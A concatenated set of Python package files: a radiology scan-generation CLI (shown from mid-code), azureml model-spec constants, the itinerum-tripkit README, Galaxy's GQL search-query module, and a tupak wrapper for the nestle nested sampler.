@click.option('-e', '--file_ext', callback=validate_file_ext, help="file format for scan generation", required=True)
def cli(uid, hdfs_uri, custom_preprocessing_script, tag, config_file, project_name, file_ext):
"""
This module takes a SeriesInstanceUID, calls a script to generate volumetric images, and updates the scan table.
This module is to be run from the top-level data-processing directory using the -m flag as follows:
Example:
$ python3 -m luna.radiology.refined_table.generate \
--hdfs_uri file:// \
--custom_preprocessing_script luna/radiology/refined_table/dicom_to_scan.py \
--uid 1.2.840.113619...... \
--project_name OV_16-.... \
--file_ext mhd \
--config_file config.yaml
"""
start_time = time.time()
ConfigSet(name=APP_CFG, config_file=config_file)
spark = SparkConfig().spark_session(config_name=APP_CFG, app_name='dicom-to-scan')
generate_scan_table(spark, uid, hdfs_uri, custom_preprocessing_script, tag, project_name, file_ext)
logger.info("--- Finished in %s seconds ---" % (time.time() - start_time))
def generate_scan_table(spark, uid, hdfs_uri, custom_preprocessing_script, tag, project_name, file_ext):
# Get environment variables
hdfs_db_root = os.environ["MIND_ROOT_DIR"]
bin_python = os.environ["PYSPARK_PYTHON"]
concept_id_type = "SeriesInstanceUID"
project_dir = os.path.join(hdfs_db_root, project_name)
output_dir = os.path.join(project_dir, const.SCANS)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
try:
df_dcmdata = spark.read.format("delta").load( hdfs_uri + os.path.join(project_dir, const.DICOM_TABLE))
except Exception as ex:
logger.error("Problem loading dicom table at " + hdfs_uri + os.path.join(project_dir, const.DICOM_TABLE))
logger.error(ex)
exit(1)
logger.info (" >>> Loaded dicom table")
def python_def_generate_scan(project_dir, file_ext, path):
'''
Accepts a project path, the file type to generate (mhd or nrrd), and a dicom path, and generates a volumetric image filename
Args:
project_dir: project location
file_ext: mhd or nrrd
path: path to the dicoms in interest
Returns:
scan_meta: array of (scan_record_uuid, filepath, filetype)
'''
scan_meta = []
job_uuid = "job-" + str(uuid.uuid4())
print ("Starting " + job_uuid)
input_dir, filename = os.path.split(path)
input_dir = input_dir[input_dir.index("/"):]
# Execute some modularized python script
print ([bin_python, custom_preprocessing_script, project_dir, input_dir, file_ext])
proc = subprocess.Popen([bin_python, custom_preprocessing_script, project_dir, input_dir, file_ext], \
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
print (f"{job_uuid} - Output from script: {out}")
if proc.returncode != 0:
print (f"{job_uuid} - Errors from script: {err}")
return scan_meta
scan_record_uuid = "-".join(["SCAN", tag, dirhash(input_dir, "sha256")])
filepath = out.decode('utf-8').split('\n')[-1]
if file_ext == 'mhd':
scan_meta = [(scan_record_uuid, filepath+'.mhd', 'mhd'), (scan_record_uuid, filepath+'.zraw', 'zraw')]
elif file_ext == 'nrrd':
scan_meta = [(scan_record_uuid, filepath+'.nrrd', 'nrrd')]
print(scan_meta)
return scan_meta
# Make our UDF
schema = ArrayType(
StructType([
StructField('scan_record_uuid', StringType(), False),
StructField('filepath', StringType(), False),
StructField('filetype', StringType(), False)
]),
)
spark.sparkContext.addPyFile(custom_preprocessing_script)
udf_generate_scan = F.udf(python_def_generate_scan, schema)
# Filter dicom table with the given SeriesInstanceUID and return 1 row. (Assumption: Dicom folders are organized by SeriesInstanceUID)
df = df_dcmdata \
.filter(F.col("metadata."+concept_id_type)==uid) \
.limit(1)
if df.count()==0:
logger.error("No matching scan for SeriesInstanceUID = " + uid)
exit(1)
# Run jobs
with CodeTimer(logger, 'Generate scans:'):
df_scan = df.withColumn("scan_data", udf_generate_scan(F.lit(project_dir), F.lit(file_ext), df.path))
# expand the array and flatten the schema
df_scan = df_scan.withColumn("exp", F.explode("scan_data"))
df_scan = df_scan.select("metadata.SeriesInstanceUID", "exp.*")
# Check if the same scan_record_uuid/filetype combo exists. if not, append to scan table.
scan_table_path = os.path.join(project_dir, const.SCAN_TABLE)
if os.path.exists(scan_table_path):
df_existing_scan = spark.read.format("delta").load(scan_table_path)
intersection = df_existing_scan.join(F.broadcast(df_scan), ["scan_record_uuid", "filetype"])
if intersection.count() == 0:
df_scan.write.format("delta") \
.mode("append") \
.save(scan_table_path)
else:
df_scan.write.format("delta") \
.mode("append") \
.save(scan_table_path)
# Validation step
df_scan.show(200, truncate=False)
if __name__ == "__main__":
cli() | PypiClean |
/azureml_designer_core-0.0.77-py3-none-any.whl/azureml/designer/core/model/constants.py |
class ModelSpecConstants:
# Top level keys in model_spec
FLAVOR_KEY = "flavor"
FLAVOR_EXTRAS_KEY = "flavor_extras"
MODEL_FILE_KEY = "model_file"
CONDA_FILE_KEY = "conda_file"
LOCAL_DEPENDENCIES_KEY = "local_dependencies"
INPUTS_KEY = "inputs"
OUTPUTS_KEY = "outputs"
SERVING_CONFIG_KEY = "serving_config"
DESCRIPTION_KEY = "description"
TIME_CREATED_KEY = "time_created"
# Flavor specified keys in model_spec
FLAVOR_NAME_KEY = "name"
SERIALIZATION_METHOD_KEY = "serialization_method"
MODEL_CLASS_KEY = "class"
MODEL_MODULE_KEY = "module"
IS_CUDA_KEY = "is_cuda"
INIT_PARAMS_KEY = "init_params"
# Machine learning task specified keys in model_spec
TASK_TYPE_KEY = "task_type"
LABEL_MAP_FILE_KEY = "label_map_file"
# Serving Config
GPU_SUPPORT_KEY = "gpu_support"
CPU_CORE_NUM_KEY = "cpu_core_num"
MEMORY_IN_GB_KEY = "memory_in_GB"
# Others
DEFAULT_ARTIFACT_SAVE_PATH = "./AzureMLModel"
CONDA_FILE_NAME = "conda.yaml"
CONDA_ENV_NAME = "project_environment"
MODEL_SPEC_FILE_NAME = "model_spec.yaml"
LOCAL_DEPENDENCIES_PATH = "local_dependencies"
LOCAL_DEPENDENCIES_ZIP_FILE_NAME = f"{LOCAL_DEPENDENCIES_PATH}.zip"
CUSTOM_MODEL_FLAVOR_NAME = "custom"
CUSTOM_MODEL_DIRECTORY = "model"
PICKLE_MODEL_FILE_NAME = "model.pkl"
PYTORCH_STATE_DICT_FILE_NAME = "state_dict.pt"
LABEL_MAP_FILE_NAME = "index_to_label.csv"
LOCAL_DEPENDENCIES_PY_FILES_PATH = "pyfiles"
# Model Inputs
MODEL_INPUT_NAME_KEY = "name"
MODEL_INPUT_VALUE_TYPE_KEY = "value_type"
MODEL_INPUT_DEFAULT_KEY = "default"
MODEL_INPUT_DESCRIPTION_KEY = "description"
MODEL_INPUT_OPTIONAL_KEY = "optional"
MODEL_INPUT_PRE_PROCESSOR_KEY = "pre_processor"
# PreProcessor
PRE_PROCESSOR_MODULE_KEY = "module"
PRE_PROCESSOR_CLASS_KEY = "class"
PRE_PROCESSOR_INIT_PARAMS_KEY = "init_params"
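# Illustrative sketch (an assumption, not taken from any spec document) of how the
# keys defined above might compose in a model_spec.yaml file; values are placeholders.
#
#     flavor:
#       name: pytorch
#       serialization_method: cloudpickle
#     model_file: model.pkl
#     conda_file: conda.yaml
#     local_dependencies: local_dependencies
#     description: example model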
class ScoreColumnConstants:
# Label and Task Type Region
BinaryClassScoredLabelType = "Binary Class Assigned Labels"
MultiClassScoredLabelType = "Multi Class Assigned Labels"
RegressionScoredLabelType = "Regression Assigned Labels"
ClusterScoredLabelType = "Cluster Assigned Labels"
ScoredLabelsColumnName = "Scored Labels"
ClusterAssignmentsColumnName = "Assignments"
# Probability Region
CalibratedScoreType = "Calibrated Score"
ScoredProbabilitiesColumnName = "Scored Probabilities"
ScoredProbabilitiesMulticlassColumnNamePattern = "Scored Probabilities"
# Distance Region
ClusterDistanceMetricsColumnNamePattern = "DistancesToClusterCenter no."
# PytorchTensor Region
TensorScoredLabelColumnName = "Tensor Output"
# Temporary Column Names for Intermediate Results
ScoredLabelIdsColumnName = "Scored Label Ids"
ScoredProbabilitiesMulticlassColumnName = "Scored Probabilities List"
# Others
# For test env where package is installed from DevOps feed
DEV_OPS_EXTRA_INDEX_URL_PREFIX = "--extra-index-url=https://azureml-modules"
DESIGNER_PIP_PACKAGE_PREFIX = "azureml-designer-" | PypiClean |
/itinerum-tripkit-0.0.26.tar.gz/itinerum-tripkit-0.0.26/README.md | # itinerum-tripkit
Documentation for library usage: https://itinerum-tripkit.readthedocs.io/
This library serves as a framework to process data from the Itinerum platform and hardware GPS loggers (e.g., QStarz). It can be used as a library in Jupyter to explore datasets interactively or imported as a module in standalone scripts and applications.
This repository also serves as the development bed for the Itinerum platform algorithms within the TRIP Lab repositories.
Looking to get started without coding? Try the [itinerum-tripkit-cli](https://github.com/TRIP-Lab/itinerum-tripkit-cli)!
## Setup
### Quickstart
1. Install this library from PyPI (a Python [virtual environment](https://docs.python.org/3/library/venv.html) is recommended)
2. Create a configuration file with input filepaths, output filepaths, and trip processing parameters. See the included `tripkit_config.py` file for a full example.
3. Import `tripkit` as a dependency in a notebook or script
For more complete installation information, see the official [itinerum-tripkit documentation](https://itinerum-tripkit.readthedocs.io/en/stable/usage/installation.html).
### Loading Subway Stations
Subway station data for trip detection can be loaded similarly for all processing modules. Place a _.csv_ file of station entrances with the columns `x` (or `longitude`) and `y` (or `latitude`). Locations are expected as geographic coordinates only. Edit the `SUBWAY_STATIONS_FP` config parameter to reflect the subway stations _.csv_ filepath.
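For example, a minimal stations file might look like the following (the coordinate values are purely illustrative):
```csv
x,y
-73.5673,45.5017
-73.5540,45.5088
```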
#### Example
_View attributes on a User_
```python
import tripkit_config
itinerum = Itinerum(tripkit_config)
# create a new database and read in .csv data
itinerum.setup()
# load all users from database
users = itinerum.load_all_users()
test_user = users[0]
print(test_user.coordinates)
print(test_user.prompt_responses)
```
_Run trip detection on a User_
```python
import tripkit_config
itinerum = Itinerum(tripkit_config)
# load user from database by uuid
user = itinerum.database.load_user('00000000-0000-0000-0000-000000000000')
# run a provided trip detection algorithm
parameters = {
'subway_entrances': itinerum.database.load_subway_entrances(),
'break_interval_seconds': tripkit_config.TRIP_DETECTION_BREAK_INTERVAL_SECONDS,
'subway_buffer_meters': tripkit_config.TRIP_DETECTION_SUBWAY_BUFFER_METERS,
'cold_start_distance': tripkit_config.TRIP_DETECTION_COLD_START_DISTANCE_METERS,
'accuracy_cutoff_meters': tripkit_config.TRIP_DETECTION_ACCURACY_CUTOFF_METERS
}
trips = itinerum.process.trip_detection.triplab.v2.algorithm.run(user.coordinates, parameters)
```
## Processing
#### Trip Detection
| Arguments | |
| ----------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| `parameters` | A dictionary to supply arbitrary kwargs to an algorithm |
| `subway_stations` | A list of subway station entrance database objects containing `latitude` and `longitude` attributes |
| `coordinates` | A timestamp-ordered list of coordinates as dicts for a specific user. Multiple users should be run in sequence and have their output coordinates concatenated into a single list after if desired. |
#### Trip Outputs
Trips will be output with the following trip codes to indicate the type of trip:
| Trip Code | Description |
| --------- | ----------------------------------- |
| 1 | Complete trip |
| 2 | Complete trip - subway |
| 101 | Missing trip |
| 102 | Missing trip - subway |
| 103 | Missing trip - less than 250m |
| 201 | Single point |
| 202 | Distance too short - less than 250m |
## Outputs
The aim of this library is to provide easy visualization of Itinerum data to assist in writing trip processing algorithms. Therefore, at a minimum, the library provides export of processed coordinates and traces as .geojson files (TBA: GeoPackage format). With a PostgreSQL backend for caching, PostGIS can be enabled (unimplemented) and a `geom` column generated for connecting QGIS directly to the output data. The library should also provide methods for easily plotting GPS data within Jupyter notebooks.
| PypiClean |
/galaxy_data-23.0.5-py3-none-any.whl/galaxy/model/search.py | import logging
import re
from json import dumps
from typing import Dict
import parsley
from sqlalchemy import and_
from sqlalchemy.orm import aliased
from galaxy.model import (
ExtendedMetadata,
ExtendedMetadataIndex,
History,
HistoryAnnotationAssociation,
HistoryDatasetAssociation,
HistoryDatasetAssociationTagAssociation,
HistoryTagAssociation,
Job,
JobParameter,
JobToInputDatasetAssociation,
JobToInputLibraryDatasetAssociation,
JobToOutputDatasetAssociation,
Library,
LibraryDataset,
LibraryDatasetDatasetAssociation,
LibraryFolder,
Page,
PageRevision,
StoredWorkflow,
StoredWorkflowTagAssociation,
)
from galaxy.model.tool_shed_install import ToolVersion
log = logging.getLogger(__name__)
class ViewField:
"""
A ViewField defines a field in a view that filter operations can be applied to
These filter operations are either handled with standard sqlalchemy filter calls,
or passed to specialized handlers (such as when a table join would be needed to
do the filtering)
Parameters:
sqlalchemy_field - Simple filtering using existing table columns, the argument is an sqlalchemy column
that the right hand value will be compared against
handler - Requires more specialized code to do filtering, usually requires a table join in order to
process the conditional
post_filter - Used when simple sqlalchemy based table filtering is not possible; the filter is applied to the loaded object,
so methods available on the object can be used for filtering. Example: a library folder must climb
its chain of parents to find out which library it belongs to
"""
def __init__(self, name, sqlalchemy_field=None, handler=None, post_filter=None, id_decode=False):
self.name = name
self.sqlalchemy_field = sqlalchemy_field
self.handler = handler
self.post_filter = post_filter
self.id_decode = id_decode
class ViewQueryBaseClass:
FIELDS: Dict[str, ViewField] = {}
VIEW_NAME = "undefined"
def __init__(self):
self.query = None
self.do_query = False
self.state = {}
self.post_filter = []
def decode_query_ids(self, trans, conditional):
if conditional.operator == "and":
self.decode_query_ids(trans, conditional.left)
self.decode_query_ids(trans, conditional.right)
else:
left_base = conditional.left.split(".")[0]
if left_base in self.FIELDS:
field = self.FIELDS[left_base]
if field.id_decode:
conditional.right = trans.security.decode_id(conditional.right)
def filter(self, left, operator, right):
if operator == "and":
self.filter(left.left, left.operator, left.right)
self.filter(right.left, right.operator, right.right)
else:
left_base = left.split(".")[0]
if left_base in self.FIELDS:
self.do_query = True
field = self.FIELDS[left_base]
if field.sqlalchemy_field is not None:
clazz, attribute = field.sqlalchemy_field
sqlalchemy_field_value = getattr(clazz, attribute)
if operator == "=":
self.query = self.query.filter(sqlalchemy_field_value == right)
elif operator == "!=":
self.query = self.query.filter(sqlalchemy_field_value != right)
elif operator == "like":
self.query = self.query.filter(sqlalchemy_field_value.like(right))
else:
raise GalaxyParseError(f"Invalid comparison operator: {operator}")
elif field.handler is not None:
field.handler(self, left, operator, right)
elif field.post_filter is not None:
self.post_filter.append([field.post_filter, left, operator, right])
else:
raise GalaxyParseError(f"Unable to filter on field: {left}")
else:
raise GalaxyParseError(f"Unknown field: {left}")
def search(self, trans):
raise GalaxyParseError(f"Unable to search view: {self.VIEW_NAME}")
def get_results(self, force_query=False):
if self.query is not None and (force_query or self.do_query):
for row in self.query.distinct().all():
selected = True
for f in self.post_filter:
if not f[0](row, f[1], f[2], f[3]):
selected = False
if selected:
yield row
##################
# Library Dataset Searching
##################
def library_extended_metadata_filter(view, left, operator, right):
view.do_query = True
if "extended_metadata_joined" not in view.state:
view.query = view.query.join(ExtendedMetadata)
view.state["extended_metadata_joined"] = True
alias = aliased(ExtendedMetadataIndex)
field = f"/{'/'.join(left.split('.')[1:])}"
view.query = view.query.filter(
and_(ExtendedMetadata.id == alias.extended_metadata_id, alias.path == field, alias.value == str(right))
)
def ldda_parent_library_filter(item, left, operator, right):
if operator == "=":
return right == item.library_dataset.folder.parent_library.id
elif operator == "!=":
return right != item.library_dataset.folder.parent_library.id
raise GalaxyParseError(f"Invalid comparison operator: {operator}")
class LibraryDatasetDatasetView(ViewQueryBaseClass):
VIEW_NAME = "library_dataset_dataset"
FIELDS = {
"extended_metadata": ViewField("extended_metadata", handler=library_extended_metadata_filter),
"name": ViewField("name", sqlalchemy_field=(LibraryDatasetDatasetAssociation, "name")),
"id": ViewField("id", sqlalchemy_field=(LibraryDatasetDatasetAssociation, "id"), id_decode=True),
"deleted": ViewField("deleted", sqlalchemy_field=(LibraryDatasetDatasetAssociation, "deleted")),
"parent_library_id": ViewField("parent_library_id", id_decode=True, post_filter=ldda_parent_library_filter),
"data_type": ViewField("data_type", sqlalchemy_field=(LibraryDatasetDatasetAssociation, "extension")),
}
def search(self, trans):
self.query = trans.sa_session.query(LibraryDatasetDatasetAssociation)
##################
# Library Searching
##################
class LibraryView(ViewQueryBaseClass):
VIEW_NAME = "library"
FIELDS = {
"name": ViewField("name", sqlalchemy_field=(Library, "name")),
"id": ViewField("id", sqlalchemy_field=(Library, "id"), id_decode=True),
"deleted": ViewField("deleted", sqlalchemy_field=(Library, "deleted")),
}
def search(self, trans):
self.query = trans.sa_session.query(Library)
##################
# Library Folder Searching
##################
def library_folder_parent_library_id_filter(item, left, operator, right):
if operator == "=":
return item.parent_library.id == right
if operator == "!=":
return item.parent_library.id != right
raise GalaxyParseError(f"Invalid comparison operator: {operator}")
def library_path_filter(item, left, operator, right):
lpath = f"/{'/'.join(item.library_path)}"
if operator == "=":
return lpath == right
if operator == "!=":
return lpath != right
raise GalaxyParseError(f"Invalid comparison operator: {operator}")
class LibraryFolderView(ViewQueryBaseClass):
VIEW_NAME = "library_folder"
FIELDS = {
"name": ViewField("name", sqlalchemy_field=(LibraryFolder, "name")),
"id": ViewField("id", sqlalchemy_field=(LibraryFolder, "id"), id_decode=True),
"parent_id": ViewField("parent_id", sqlalchemy_field=(LibraryFolder, "parent_id"), id_decode=True),
"parent_library_id": ViewField(
"parent_library_id", post_filter=library_folder_parent_library_id_filter, id_decode=True
),
"library_path": ViewField("library_path", post_filter=library_path_filter),
}
def search(self, trans):
self.query = trans.sa_session.query(LibraryFolder)
##################
# Library Dataset Searching
##################
def library_dataset_name_filter(item, left, operator, right):
if operator == "=":
return item.name == right
if operator == "!=":
return item.name != right
raise GalaxyParseError(f"Invalid comparison operator: {operator}")
class LibraryDatasetView(ViewQueryBaseClass):
VIEW_NAME = "library_dataset"
FIELDS = {
"name": ViewField("name", post_filter=library_dataset_name_filter),
"id": ViewField("id", sqlalchemy_field=(LibraryDataset, "id"), id_decode=True),
"folder_id": ViewField("folder_id", sqlalchemy_field=(LibraryDataset, "folder_id"), id_decode=True),
}
def search(self, trans):
self.query = trans.sa_session.query(LibraryDataset)
##################
# Tool Searching
##################
class ToolView(ViewQueryBaseClass):
VIEW_NAME = "tool"
FIELDS = {
"tool_id": ViewField("name", sqlalchemy_field=(ToolVersion, "tool_id")),
"id": ViewField("id", sqlalchemy_field=(ToolVersion, "id")),
}
def search(self, trans):
self.query = trans.install_model.context.query(ToolVersion)
##################
# History Dataset Searching
##################
def history_dataset_handle_tag(view, left, operator, right):
if operator == "=":
view.do_query = True
# aliasing the tag association table, so multiple links to different tags can be formed during a single query
tag_table = aliased(HistoryDatasetAssociationTagAssociation)
view.query = view.query.filter(HistoryDatasetAssociation.id == tag_table.history_dataset_association_id)
tmp = right.split(":")
view.query = view.query.filter(tag_table.user_tname == tmp[0])
if len(tmp) > 1:
view.query = view.query.filter(tag_table.user_value == tmp[1])
else:
raise GalaxyParseError(f"Invalid comparison operator: {operator}")
def history_dataset_extended_metadata_filter(view, left, operator, right):
view.do_query = True
if "extended_metadata_joined" not in view.state:
view.query = view.query.join(ExtendedMetadata)
view.state["extended_metadata_joined"] = True
alias = aliased(ExtendedMetadataIndex)
field = f"/{'/'.join(left.split('.')[1:])}"
view.query = view.query.filter(
and_(ExtendedMetadata.id == alias.extended_metadata_id, alias.path == field, alias.value == str(right))
)
class HistoryDatasetView(ViewQueryBaseClass):
DOMAIN = "history_dataset"
FIELDS = {
"name": ViewField("name", sqlalchemy_field=(HistoryDatasetAssociation, "name")),
"id": ViewField("id", sqlalchemy_field=(HistoryDatasetAssociation, "id"), id_decode=True),
"history_id": ViewField(
"history_id", sqlalchemy_field=(HistoryDatasetAssociation, "history_id"), id_decode=True
),
"tag": ViewField("tag", handler=history_dataset_handle_tag),
"copied_from_ldda_id": ViewField(
"copied_from_ldda_id",
sqlalchemy_field=(HistoryDatasetAssociation, "copied_from_library_dataset_dataset_association_id"),
id_decode=True,
),
"copied_from_hda_id": ViewField(
"copied_from_hda_id",
sqlalchemy_field=(HistoryDatasetAssociation, "copied_from_history_dataset_association_id"),
id_decode=True,
),
"deleted": ViewField("deleted", sqlalchemy_field=(HistoryDatasetAssociation, "deleted")),
"extended_metadata": ViewField("extended_metadata", handler=history_dataset_extended_metadata_filter),
}
def search(self, trans):
self.query = trans.sa_session.query(HistoryDatasetAssociation)
##################
# History Searching
##################
def history_handle_tag(view, left, operator, right):
if operator == "=":
view.do_query = True
tag_table = aliased(HistoryTagAssociation)
view.query = view.query.filter(History.id == tag_table.history_id)
tmp = right.split(":")
view.query = view.query.filter(tag_table.user_tname == tmp[0])
if len(tmp) > 1:
view.query = view.query.filter(tag_table.user_value == tmp[1])
else:
raise GalaxyParseError(f"Invalid comparison operator: {operator}")
def history_handle_annotation(view, left, operator, right):
if operator == "=":
view.do_query = True
view.query = view.query.filter(
and_(
HistoryAnnotationAssociation.history_id == History.id, HistoryAnnotationAssociation.annotation == right
)
)
elif operator == "like":
view.do_query = True
view.query = view.query.filter(
and_(
HistoryAnnotationAssociation.history_id == History.id,
HistoryAnnotationAssociation.annotation.like(right),
)
)
else:
raise GalaxyParseError(f"Invalid comparison operator: {operator}")
class HistoryView(ViewQueryBaseClass):
DOMAIN = "history"
FIELDS = {
"name": ViewField("name", sqlalchemy_field=(History, "name")),
"id": ViewField("id", sqlalchemy_field=(History, "id"), id_decode=True),
"tag": ViewField("tag", handler=history_handle_tag),
"annotation": ViewField("annotation", handler=history_handle_annotation),
"deleted": ViewField("deleted", sqlalchemy_field=(History, "deleted")),
}
def search(self, trans):
self.query = trans.sa_session.query(History)
##################
# Workflow Searching
##################
def workflow_tag_handler(view, left, operator, right):
if operator == "=":
view.do_query = True
view.query = view.query.filter(StoredWorkflow.id == StoredWorkflowTagAssociation.stored_workflow_id)
tmp = right.split(":")
view.query = view.query.filter(StoredWorkflowTagAssociation.user_tname == tmp[0])
if len(tmp) > 1:
view.query = view.query.filter(StoredWorkflowTagAssociation.user_value == tmp[1])
else:
raise GalaxyParseError(f"Invalid comparison operator: {operator}")
class WorkflowView(ViewQueryBaseClass):
DOMAIN = "workflow"
FIELDS = {
"name": ViewField("name", sqlalchemy_field=(StoredWorkflow, "name")),
"id": ViewField("id", sqlalchemy_field=(StoredWorkflow, "id"), id_decode=True),
"tag": ViewField("tag", handler=workflow_tag_handler),
"deleted": ViewField("deleted", sqlalchemy_field=(StoredWorkflow, "deleted")),
}
def search(self, trans):
self.query = trans.sa_session.query(StoredWorkflow)
##################
# Job Searching
##################
def job_param_filter(view, left, operator, right):
view.do_query = True
alias = aliased(JobParameter)
param_name = re.sub(r"^param.", "", left)
view.query = view.query.filter(and_(Job.id == alias.job_id, alias.name == param_name, alias.value == dumps(right)))
def job_input_hda_filter(view, left, operator, right):
view.do_query = True
alias = aliased(JobToInputDatasetAssociation)
param_name = re.sub(r"^input_hda.", "", left)
view.query = view.query.filter(and_(Job.id == alias.job_id, alias.name == param_name, alias.dataset_id == right))
def job_input_ldda_filter(view, left, operator, right):
view.do_query = True
alias = aliased(JobToInputLibraryDatasetAssociation)
param_name = re.sub(r"^input_ldda.", "", left)
view.query = view.query.filter(and_(Job.id == alias.job_id, alias.name == param_name, alias.ldda_id == right))
def job_output_hda_filter(view, left, operator, right):
view.do_query = True
alias = aliased(JobToOutputDatasetAssociation)
param_name = re.sub(r"^output_hda.", "", left)
view.query = view.query.filter(and_(Job.id == alias.job_id, alias.name == param_name, alias.dataset_id == right))
class JobView(ViewQueryBaseClass):
DOMAIN = "job"
FIELDS = {
"tool_name": ViewField("tool_name", sqlalchemy_field=(Job, "tool_id")),
"state": ViewField("state", sqlalchemy_field=(Job, "state")),
"param": ViewField("param", handler=job_param_filter),
"input_ldda": ViewField("input_ldda", handler=job_input_ldda_filter, id_decode=True),
"input_hda": ViewField("input_hda", handler=job_input_hda_filter, id_decode=True),
"output_hda": ViewField("output_hda", handler=job_output_hda_filter, id_decode=True),
}
def search(self, trans):
self.query = trans.sa_session.query(Job)
##################
# Page Searching
##################
class PageView(ViewQueryBaseClass):
DOMAIN = "page"
FIELDS = {
"id": ViewField("id", sqlalchemy_field=(Page, "id"), id_decode=True),
"slug": ViewField("slug", sqlalchemy_field=(Page, "slug")),
"title": ViewField("title", sqlalchemy_field=(Page, "title")),
"deleted": ViewField("deleted", sqlalchemy_field=(Page, "deleted")),
}
def search(self, trans):
self.query = trans.sa_session.query(Page)
##################
# Page Revision Searching
##################
class PageRevisionView(ViewQueryBaseClass):
DOMAIN = "page_revision"
FIELDS = {
"id": ViewField("id", sqlalchemy_field=(PageRevision, "id"), id_decode=True),
"title": ViewField("title", sqlalchemy_field=(PageRevision, "title")),
"page_id": ViewField("page_id", sqlalchemy_field=(PageRevision, "page_id"), id_decode=True),
}
def search(self, trans):
self.query = trans.sa_session.query(PageRevision)
# The view mapping takes a user's name for a table and maps it to a View class
# that will handle queries.
view_mapping = {
"library": LibraryView,
"library_folder": LibraryFolderView,
"library_dataset_dataset": LibraryDatasetDatasetView,
"library_dataset": LibraryDatasetView,
"lda": LibraryDatasetView,
"ldda": LibraryDatasetDatasetView,
"history_dataset": HistoryDatasetView,
"hda": HistoryDatasetView,
"history": HistoryView,
"workflow": WorkflowView,
"tool": ToolView,
"job": JobView,
"page": PageView,
"page_revision": PageRevisionView,
}
# The GQL grammar is defined in Parsley syntax ( https://parsley.readthedocs.io/ )
gqlGrammar = r"""
expr = 'select' bs field_desc:f bs 'from' bs word:t (
bs 'where' bs conditional:c ws -> GalaxyQuery(f,t,c)
| ws -> GalaxyQuery(f, t, None) )
bs = ' '+
ws = ' '*
field_desc = ( '*' -> ['*']
| field_list )
field_list = field_name:x (
ws ',' ws field_list:y -> [x] + y
| -> [x]
)
conditional = logic_statement:x (
bs 'and' bs conditional:y -> GalaxyQueryAnd(x,y)
| -> x
)
word = alphanum+:x -> "".join(x)
field_name = word:x (
'.' quote_word:y -> x + "." + y
|-> x
)
alphanum = anything:x ?(re.search(r'\w', x) is not None) -> x
logic_statement = field_name:left ws comparison:comp ws value_word:right -> GalaxyQueryComparison(left, comp, right)
value_word = (
'false' -> False
| 'False' -> False
| 'true' -> True
| 'True' -> True
| 'None' -> None
| quote_word )
comparison = ( '=' -> '='
| '>' -> '>'
| '<' -> '<'
| '!=' -> '!='
| '>=' -> '>='
| '<=' -> '<='
| 'like' -> 'like'
)
quote_word = "'" not_quote*:x "'" -> "".join(x)
not_quote = anything:x ?(x != "'") -> x
not_dquote = anything:x ?(x != '"') -> x
"""
class GalaxyQuery:
"""
This class represents a data structure of a compiled GQL query
"""
def __init__(self, field_list, table_name, conditional):
self.field_list = field_list
self.table_name = table_name
self.conditional = conditional
class GalaxyQueryComparison:
"""
This class represents the data structure of the comparison arguments of a
compiled GQL query (i.e., where name='Untitled History')
"""
def __init__(self, left, operator, right):
self.left = left
self.operator = operator
self.right = right
class GalaxyQueryAnd:
"""
This class represents the data structure of an 'and' conjunction joining two
conditionals in a compiled GQL query (i.e., where deleted=False and name='Untitled History')
"""
def __init__(self, left, right):
self.left = left
self.operator = "and"
self.right = right
class GalaxyParseError(Exception):
pass
class SearchQuery:
def __init__(self, view, query):
self.view = view
self.query = query
def decode_query_ids(self, trans):
if self.query.conditional is not None:
self.view.decode_query_ids(trans, self.query.conditional)
def process(self, trans):
self.view.search(trans)
if self.query.conditional is not None:
self.view.filter(self.query.conditional.left, self.query.conditional.operator, self.query.conditional.right)
return self.view.get_results(True)
def item_to_api_value(self, item):
r = item.to_dict(view="element")
if self.query.field_list.count("*"):
return r
o = {}
for a in r:
if a in self.query.field_list:
o[a] = r[a]
return o
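# Usage sketch for the engine defined below (illustrative; `trans` is assumed to be
# a Galaxy transaction object exposing the SQLAlchemy session the view classes expect):
#
#     engine = GalaxySearchEngine()
#     search_query = engine.query("select name, id from history where deleted=False")
#     search_query.decode_query_ids(trans)
#     for item in search_query.process(trans):
#         print(search_query.item_to_api_value(item))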
class GalaxySearchEngine:
"""
Primary class for searching. Parses GQL (Galaxy Query Language) queries and returns a 'SearchQuery' class
"""
def __init__(self):
self.parser = parsley.makeGrammar(
gqlGrammar,
{
"re": re,
"GalaxyQuery": GalaxyQuery,
"GalaxyQueryComparison": GalaxyQueryComparison,
"GalaxyQueryAnd": GalaxyQueryAnd,
},
)
def query(self, query_text):
q = self.parser(query_text).expr()
if q.table_name in view_mapping:
view = view_mapping[q.table_name]()
return SearchQuery(view, q)
raise GalaxyParseError(f"No such table {q.table_name}") | PypiClean |
/tupak-0.2.3.tar.gz/tupak-0.2.3/tupak/core/sampler/nestle.py | from __future__ import absolute_import
import numpy as np
from pandas import DataFrame
from .base_sampler import NestedSampler
class Nestle(NestedSampler):
"""tupak wrapper `nestle.Sampler` (http://kylebarbary.com/nestle/)
All positional and keyword arguments (i.e., the args and kwargs) passed to
`run_sampler` will be propagated to `nestle.sample`, see documentation for
that function for further help. Under Keyword Arguments, we list commonly
used kwargs and the tupak defaults
Keyword Arguments
------------------
npoints: int
The number of live points, note this can also equivalently be given as
one of [nlive, nlives, n_live_points]
method: {'classic', 'single', 'multi'} ('multi')
Method used to select new points
verbose: Bool
If true, print information about the convergence during
sampling
"""
default_kwargs = dict(verbose=True, method='multi', npoints=500,
update_interval=None, npdim=None, maxiter=None,
maxcall=None, dlogz=None, decline_factor=None,
rstate=None, callback=None)
def _translate_kwargs(self, kwargs):
if 'npoints' not in kwargs:
for equiv in self.npoints_equiv_kwargs:
if equiv in kwargs:
kwargs['npoints'] = kwargs.pop(equiv)
def _verify_kwargs_against_default_kwargs(self):
if self.kwargs['verbose']:
import nestle
self.kwargs['callback'] = nestle.print_progress
self.kwargs.pop('verbose')
NestedSampler._verify_kwargs_against_default_kwargs(self)
def run_sampler(self):
""" Runs Nestle sampler with given kwargs and returns the result
Returns
-------
tupak.core.result.Result: Packaged information about the result
"""
import nestle
out = nestle.sample(
loglikelihood=self.log_likelihood,
prior_transform=self.prior_transform,
ndim=self.ndim, **self.kwargs)
print("")
self.result.sampler_output = out
self.result.samples = nestle.resample_equal(out.samples, out.weights)
self.result.nested_samples = DataFrame(
out.samples, columns=self.search_parameter_keys)
self.result.nested_samples['weights'] = out.weights
